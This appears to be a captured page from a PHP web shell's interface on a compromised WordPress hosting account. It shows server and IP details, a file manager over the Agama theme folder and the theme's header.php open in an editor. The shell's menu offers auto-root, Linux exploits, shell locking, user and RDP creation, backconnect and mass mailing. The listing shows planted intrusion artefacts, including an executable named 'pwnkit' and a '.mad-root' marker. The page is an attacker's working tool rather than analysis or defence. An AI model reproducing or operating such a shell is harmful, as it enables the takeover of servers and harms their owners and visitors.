Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
agama /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.txt
23.33
KB
-rw-r--r--
author.php
4.52
KB
-rw-r--r--
bbpress.php
886
B
-rw-r--r--
category.php
1.25
KB
-rw-r--r--
comments.php
2.22
KB
-rw-r--r--
editor-style-rtl.css
382
B
-rw-r--r--
editor-style.css
5.35
KB
-rw-r--r--
footer.php
953
B
-rw-r--r--
functions.php
1.54
KB
-rw-r--r--
header.php
1.85
KB
-rw-r--r--
image.php
6.37
KB
-rw-r--r--
index.php
967
B
-rw-r--r--
license.txt
17.69
KB
-rw-r--r--
page.php
708
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rtl.css
5.51
KB
-rw-r--r--
screenshot.png
289.73
KB
-rw-r--r--
searchform.php
666
B
-rw-r--r--
sidebar.php
814
B
-rw-r--r--
style.css
90.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The Header template * * @author Theme Vision <support@theme-vision.com> * @package Agama * @since 1.0.0 */ // Do not allow direct access to the file. if( ! defined( 'ABSPATH' ) ) { exit; } ?> <!DOCTYPE html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?><?php bloginfo( 'description' ); ?>" /> <meta name="viewport" content="width=device-width" /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" /> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php wp_body_open(); ?> <a class="screen-reader-text skip-link" href="#page"> <?php esc_html_e( 'Skip to content', 'agama' ); ?> </a><!-- .screen-reader-text --> <div id="agama-main-wrapper" class="<?php Agama::main_wrapper_class(); ?>"> <?php /** * Hook: agama/before_header_wrapper * * @hooked none * * @since 1.4.4 */ do_action( 'agama/before_header_wrapper' ); /** * The Header */ if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'header' ) ) { get_template_part( 'template-parts/header' ); } /** * Hook: agama/after_header_wrapper * * @hooked agama_header_image - 10 * @hooked agama_slider - 20 * @hooked agama_breadcrumb - 30 * * @since 1.4.4 */ do_action( 'agama/after_header_wrapper' ); ?> <div id="page" class="hfeed site"> <div id="main" class="wrapper"> <div class="vision-row tv-row"> <?php /** * Hook: agama/before_content * * @hooked agama_frontpage_boxes - 10 * * @since 1.5.8 */ do_action( 'agama/before_content' ); ?>
Close